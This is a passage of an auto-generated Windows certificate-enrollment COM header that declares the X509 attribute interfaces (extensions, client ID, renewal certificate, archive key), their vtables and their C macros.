            __RPC__in IX509Attributes * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in_opt IX509Attribute *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509Attributes * This);
        
        END_INTERFACE
    } IX509AttributesVtbl;

    interface IX509Attributes
    {
        CONST_VTBL struct IX509AttributesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Attributes_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Attributes_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Attributes_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Attributes_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Attributes_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Attributes_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Attributes_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Attributes_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509Attributes_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509Attributes_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509Attributes_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509Attributes_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509Attributes_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Attributes_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeExtensions_INTERFACE_DEFINED__
#define __IX509AttributeExtensions_INTERFACE_DEFINED__

/* interface IX509AttributeExtensions */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeExtensions;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab324-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeExtensions : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IX509Extensions *pExtensions) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeExtensionsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeExtensions * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeExtensions * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeExtensions * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in_opt IX509Extensions *pExtensions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        END_INTERFACE
    } IX509AttributeExtensionsVtbl;

    interface IX509AttributeExtensions
    {
        CONST_VTBL struct IX509AttributeExtensionsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeExtensions_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeExtensions_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeExtensions_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeExtensions_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeExtensions_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeExtensions_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeExtensions_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeExtensions_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeExtensions_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeExtensions_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeExtensions_InitializeEncode(This,pExtensions)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pExtensions) ) 

#define IX509AttributeExtensions_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeExtensions_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeExtensions_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0037 */
/* [local] */ 

typedef 
enum RequestClientInfoClientId
    {	ClientIdNone	= 0,
	ClientIdXEnroll2003	= 1,
	ClientIdAutoEnroll2003	= 2,
	ClientIdWizard2003	= 3,
	ClientIdCertReq2003	= 4,
	ClientIdDefaultRequest	= 5,
	ClientIdAutoEnroll	= 6,
	ClientIdRequestWizard	= 7,
	ClientIdEOBO	= 8,
	ClientIdCertReq	= 9,
	ClientIdTest	= 10,
	ClientIdUserStart	= 1000
    } 	RequestClientInfoClientId;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0037_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0037_v0_0_s_ifspec;

#ifndef __IX509AttributeClientId_INTERFACE_DEFINED__
#define __IX509AttributeClientId_INTERFACE_DEFINED__

/* interface IX509AttributeClientId */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeClientId;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab325-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeClientId : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ RequestClientInfoClientId ClientId,
            /* [in] */ __RPC__in BSTR strMachineDnsName,
            /* [in] */ __RPC__in BSTR strUserSamName,
            /* [in] */ __RPC__in BSTR strProcessName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ClientId( 
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MachineDnsName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UserSamName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProcessName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeClientIdVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeClientId * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeClientId * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeClientId * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeClientId * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ RequestClientInfoClientId ClientId,
            /* [in] */ __RPC__in BSTR strMachineDnsName,
            /* [in] */ __RPC__in BSTR strUserSamName,
            /* [in] */ __RPC__in BSTR strProcessName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineDnsName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UserSamName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProcessName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeClientIdVtbl;

    interface IX509AttributeClientId
    {
        CONST_VTBL struct IX509AttributeClientIdVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeClientId_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeClientId_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeClientId_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeClientId_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeClientId_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeClientId_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeClientId_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeClientId_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeClientId_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeClientId_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeClientId_InitializeEncode(This,ClientId,strMachineDnsName,strUserSamName,strProcessName)	\
    ( (This)->lpVtbl -> InitializeEncode(This,ClientId,strMachineDnsName,strUserSamName,strProcessName) ) 

#define IX509AttributeClientId_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeClientId_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509AttributeClientId_get_MachineDnsName(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineDnsName(This,pValue) ) 

#define IX509AttributeClientId_get_UserSamName(This,pValue)	\
    ( (This)->lpVtbl -> get_UserSamName(This,pValue) ) 

#define IX509AttributeClientId_get_ProcessName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProcessName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeClientId_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__
#define __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__

/* interface IX509AttributeRenewalCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeRenewalCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab326-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeRenewalCertificate : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCert) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RenewalCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeRenewalCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeRenewalCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeRenewalCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeRenewalCertificate * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCert);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeRenewalCertificateVtbl;

    interface IX509AttributeRenewalCertificate
    {
        CONST_VTBL struct IX509AttributeRenewalCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeRenewalCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeRenewalCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeRenewalCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeRenewalCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeRenewalCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeRenewalCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeRenewalCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeRenewalCertificate_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeRenewalCertificate_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeRenewalCertificate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeRenewalCertificate_InitializeEncode(This,Encoding,strCert)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strCert) ) 

#define IX509AttributeRenewalCertificate_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeRenewalCertificate_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeArchiveKey_INTERFACE_DEFINED__
#define __IX509AttributeArchiveKey_INTERFACE_DEFINED__

/* interface IX509AttributeArchiveKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeArchiveKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab327-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeArchiveKey : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IX509PrivateKey *pKey,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCAXCert,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ LONG EncryptionStrength) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyBlob( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeArchiveKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeArchiveKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeArchiveKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeArchiveKey * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pKey,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCAXCert,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ LONG EncryptionStrength);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyBlob )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509AttributeArchiveKey * This,
